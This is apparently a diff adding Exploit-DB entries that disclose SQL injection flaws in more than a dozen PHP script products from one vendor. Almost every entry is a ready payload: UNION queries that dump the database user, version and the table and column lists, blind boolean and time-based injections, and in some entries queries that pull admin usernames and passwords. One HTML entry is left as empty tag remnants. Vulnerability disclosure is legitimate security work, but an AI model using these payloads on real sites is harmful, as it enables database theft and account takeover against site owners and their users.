@@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Multivendor Penny Auction Clone Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/penny-auction-script/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/detail/[SQL] +# +# -48++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29))--+- +# +# http://server/bidding/detail/-48++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43291.txt b/exploits/php/webapps/43291.txt new file mode 100644 index 000000000..1a76eb6ff --- /dev/null +++ b/exploits/php/webapps/43291.txt 
@@ -0,0 +1,37 @@ +# # # # # +# Exploit Title: Online Exam Test Application Script 1.6 - 'Exams.php 'sort' SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/online-exam-test-application/ +# Version: 1.6 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/exams.php?sort=[SQL] +# +# -4++UNION+ALL+SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6--+- +# +# http://server/exams.php?sort=-4++UNION+ALL+SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6--+- +# +# Parameter: sort (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: sort=4 AND 9300=9300 +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 6 columns +# Payload: sort=4 UNION ALL SELECT NULL,CONCAT(0x717a6b7071,0x436a5574724b7477565147546d496b47534c4e586c4275794c6359695374477874484b4669767978,0x7176627871),NULL,NULL,NULL,NULL-- Knya +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43292.html b/exploits/php/webapps/43292.html new file mode 100644 index 000000000..ef37c8d20 --- /dev/null +++ b/exploits/php/webapps/43292.html @@ -0,0 +1,29 @@ + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43293.txt b/exploits/php/webapps/43293.txt new file mode 100644 index 000000000..5aceeaa85 --- /dev/null +++ b/exploits/php/webapps/43293.txt @@ -0,0 +1,49 @@ +# # # # # +# Exploit Title: PHP Multivendor Ecommerce 1.0 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/php-multivendor-ecommerce/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/single_detail.php?sid=[SQL] +# +# Parameter: sid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: sid=22 AND 4059=4059 +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: sid=22 AND SLEEP(5) +# +# 2) +# http://localhost/[PATH]/category.php?searchcat=[SQL] +# +# Parameter: searchcat (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: searchcat=s%' AND 4309=4309 AND '%'=' +# +# 3) +# http://localhost/[PATH]/category.php?chid1=[SQL] +# +# Parameter: chid1 (GET) +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: chid1=46' AND SLEEP(5) AND 'DzvZ'='DzvZ +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43294.txt b/exploits/php/webapps/43294.txt new file mode 100644 index 000000000..778b8717d --- /dev/null +++ b/exploits/php/webapps/43294.txt 
@@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Professional Service Script 1.0 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/professional-service-script/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/service-list?city=[SQL]&main_search= +# +# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# http://server/service-list?city='+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search= +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43295.txt b/exploits/php/webapps/43295.txt new file mode 100644 index 000000000..f36d1f373 --- /dev/null +++ b/exploits/php/webapps/43295.txt 
@@ -0,0 +1,35 @@ +# # # # # +# Exploit Title: Readymade PHP Classified Script 3.3 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/advance-olx-clone/ +# Version: 3.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/categories?subctid=[SQL] +# +# -yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+- +# +# http://server/categories?subctid=-yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+- +# +# 2) +# http://localhost/[PATH]/categories?&mctid=[SQL] +# +# -Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- +# +# http://server/categories?&mctid=-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43296.txt b/exploits/php/webapps/43296.txt new file mode 100644 index 000000000..c83eb152d --- /dev/null +++ b/exploits/php/webapps/43296.txt 
@@ -0,0 +1,35 @@
+# # # # #
+# Exploit Title: Readymade Video Sharing Script 3.2 - SQL Injection
+# Dork: N/A
+# Date: 09.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/
+# Version: 3.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&report_videos[]=[SQL]&report_submit=
+#
+# http://server/single-video-detail.php?video_id=MTMy&report_videos[]='&report_submit=
+#
+# Parameter: report_videos[] (GET)
+# Type: boolean-based blind
+# Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)
+# Payload: video_id=MTMy&report_videos[]=1' AND ELT(7764=7764,9174) AND 'BZFh'='BZFh&report_submit=
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: video_id=MTMy&report_videos[]=1' AND SLEEP(5) AND 'MRQT'='MRQT&report_submit=
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43297.txt b/exploits/php/webapps/43297.txt
new file mode 100644
index 000000000..d7d888f1d
--- /dev/null
+++ b/exploits/php/webapps/43297.txt
@@ -0,0 +1,35 @@
+# # # # #
+# Exploit Title: Responsive Realestate Script 3.2 - SQL Injection
+# Dork: N/A
+# Date: 09.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/responsive-realestate-script/
+# Version: 3.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/property-list?tbud=5001-10000[SQL]&quicksrch1=
+#
+# 34 columns
+#
+# Parameter: tbud (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: tbud=5001-10000 AND 4719=4719&quicksrch1=
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: tbud=5001-10000 AND SLEEP(5)&quicksrch1=
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43299.txt b/exploits/php/webapps/43299.txt
new file mode 100644
index 000000000..eb6b138aa
--- /dev/null
+++ b/exploits/php/webapps/43299.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Multireligion Responsive Matrimonial 4.7.2 - SQL Injection
+# Dork: N/A
+# Date: 09.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/multireligion-responsive-matrimonial/
+# Version: 4.7.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/success-story.php?succid=[SQL]
+#
+# -16++/*!02222UNION*/(/*!02222SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929)--+-
+#
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43300.txt b/exploits/php/webapps/43300.txt
new file mode 100644
index 000000000..2524ecea6
--- /dev/null
+++ b/exploits/php/webapps/43300.txt
@@ -0,0 +1,36 @@
+# # # # #
+# Exploit Title: Responsive Events & Movie Ticket Booking Script 3.2.1 - SQL Injection
+# Dork: N/A
+# Date: 09.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/responsive-events-movie-ticket-booking-script/
+# Version: 3.2.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/findcity.php?q=[SQL]
+#
+# s'+/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230--+-
+#
+#
+# Parameter: q (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: q=s%' AND 6957=6957 AND '%'='
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: q=s%' AND SLEEP(5) AND '%'='
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43301.txt b/exploits/php/webapps/43301.txt
new file mode 100644
index 000000000..414ad3291
--- /dev/null
+++ b/exploits/php/webapps/43301.txt
@@ -0,0 +1,39 @@
+# # # # #
+# Exploit Title: Multiplex Movie Theater Booking Script 3.1.5 - SQL Injection
+# Dork: N/A
+# Date: 09.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/multiplex-theater-booking-script/
+# Version: 3.1.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/trailer-detail.php?moid=[SQL]
+#
+# -122'++UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),13,14,15,16,17,18,19,20,21,22,23--+-
+#
+#
+# 2)
+# http://localhost/[PATH]/show-time.php?moid=[SQL]
+#
+# -102'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x7469636b65745f61646d696e)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23))--+-
+#
+#
+# 3)
+# http://localhost/[PATH]/event-detail.php?eid=[SQL]
+#
+# -45'++UNION+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(ticket_admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,admin_user,admin_pass,0x3c62723e))))x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
+#
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43302.txt b/exploits/php/webapps/43302.txt
new file mode 100644
index 000000000..cf2e2797a
--- /dev/null
+++ b/exploits/php/webapps/43302.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Single Theater Booking Script 3.2.1 - SQL Injection
+# Dork: N/A
+# Date: 09.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/single-theater-booking-script/
+# Version: 3.2.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/findcity.php?q=[SQL]
+#
+# s'++/*!02222UNION*/+/*!02222SELECT*/+1,2,3,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),5--+-
+#
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43304.txt b/exploits/php/webapps/43304.txt
new file mode 100644
index 000000000..1ffa752b5
--- /dev/null
+++ b/exploits/php/webapps/43304.txt
@@ -0,0 +1,57 @@
+# # # # #
+# Exploit Title: Advanced Real Estate Script 4.0.7 - SQL Injection
+# Dork: N/A
+# Date: 10.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/advanced-real-estate-script/
+# Version: 4.0.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/search-results.php?Projectmain=[SQL]&search=
+#
+# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
+#
+#
+# 2)
+# http://localhost/[PATH]/search-results.php?proj_type=[SQL]&search=
+#
+# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!05555Select*/+export_set(5,@:=0,(/*!05555select*/+count(*)/*!05555from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!05555table_name*/,0x3c6c693e,2),/*!05555column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
+#
+#
+# 3)
+# http://localhost/[PATH]/search-results.php?searchtext=[SQL]&search=
+#
+# 
-1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
+#
+#
+# 4)
+# http://localhost/[PATH]/search-results.php?sell_price=[SQL]&search=
+#
+# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
+#
+#
+# 5)
+# http://localhost/[PATH]/search-results.php?maxprice=[SQL]&search=
+#
+# -1022220'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
+#
+#
+# 6)
+# http://localhost/[PATH]/search-results.php?maxprice=[SQL]&search=
+#
+# 
-45'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
+#
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43305.txt b/exploits/php/webapps/43305.txt
new file mode 100644
index 000000000..e3d5c65fd
--- /dev/null
+++ b/exploits/php/webapps/43305.txt
@@ -0,0 +1,29 @@
+# # # # #
+# Exploit Title: Entrepreneur Bus Booking Script 3.0.4 - SQL Injection
+# Dork: N/A
+# Date: 10.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/entrepreneur-bus-booking-script/
+# Version: 3.0.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/booker_details.php?sourcebus=[SQL]
+#
+# -1++/*!09999UNION*/+/*!09999SELECT*/+(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2))--+-
+#
+# -1++/*!09999UNION*/+/*!09999SELECT*/+(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)/*!50000FROM*/(adminlogin)/*!50000WHERE*/(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,0x3c62723e555345524e414d453a,admin_username,0x3c62723e504153533a,admin_password,0x3c62723e564552204159415249,0x3c62723e))))x)--+-
+#
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43306.txt b/exploits/php/webapps/43306.txt
new file mode 100644
index 000000000..d3b233355
--- /dev/null
+++ b/exploits/php/webapps/43306.txt
@@ -0,0 +1,33 @@
+# # # # #
+# Exploit Title: MLM Forex Market Plan Script 2.0.4 - SQL Injection
+# Dork: N/A
+# Date: 10.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/mlm-forex-market-plan-script/
+# Version: 2.0.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/news_detail.php?newid=[SQL]
+#
+# -7'++/*!06666UNION*/(/*!06666SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!06666Select*/+export_set(5,@:=0,(/*!06666select*/+count(*)/*!06666from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!06666table_name*/,0x3c6c693e,2),/*!06666column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629)--+-
+#
+#
+# 2)
+# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
+#
+# -1'++/*!04444UNION*/(/*!04444SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!04444Select*/+export_set(5,@:=0,(/*!04444select*/+count(*)/*!04444from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!04444table_name*/,0x3c6c693e,2),/*!04444column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629,0x37)--+-
+#
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43307.txt b/exploits/php/webapps/43307.txt
new file mode 100644
index 000000000..69576c75f
--- /dev/null
+++ b/exploits/php/webapps/43307.txt
@@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: MLM Forced Matrix 2.0.9 - SQL Injection
+# Dork: N/A
+# Date: 10.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/mlm-forced-matrix/
+# Version: 2.0.9
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/news-detail.php?newid=[SQL]
+#
+# -7'++/*!00008UNION*/(/*!00008SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!00008Select*/+export_set(5,@:=0,(/*!00008select*/+count(*)/*!00008from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00008table_name*/,0x3c6c693e,2),/*!00008column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629)--+-
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43308.txt b/exploits/php/webapps/43308.txt
new file mode 100644
index 000000000..7c96643ca
--- /dev/null
+++ b/exploits/php/webapps/43308.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Car Rental Script 2.0.4 - SQL Injection
+# Dork: N/A
+# Date: 10.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/car-rental-script/
+# Version: 2.0.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/countrycode1.php?val=[SQL]
+#
+# -1'++/*!07777UNION*/+/*!07777SELECT*/+@@version--+-
+#
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43309.txt b/exploits/php/webapps/43309.txt
new file mode 100644
index 000000000..2bdbf30d3
--- /dev/null
+++ b/exploits/php/webapps/43309.txt
@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: Groupon Clone Script 3.01 - 'state_id' 's' SQL Injection
+# Dork: N/A
+# Date: 10.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/groupon-clone-script/
+# Version: 3.01
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/city_ajax.php?state_id=[SQL]
+#
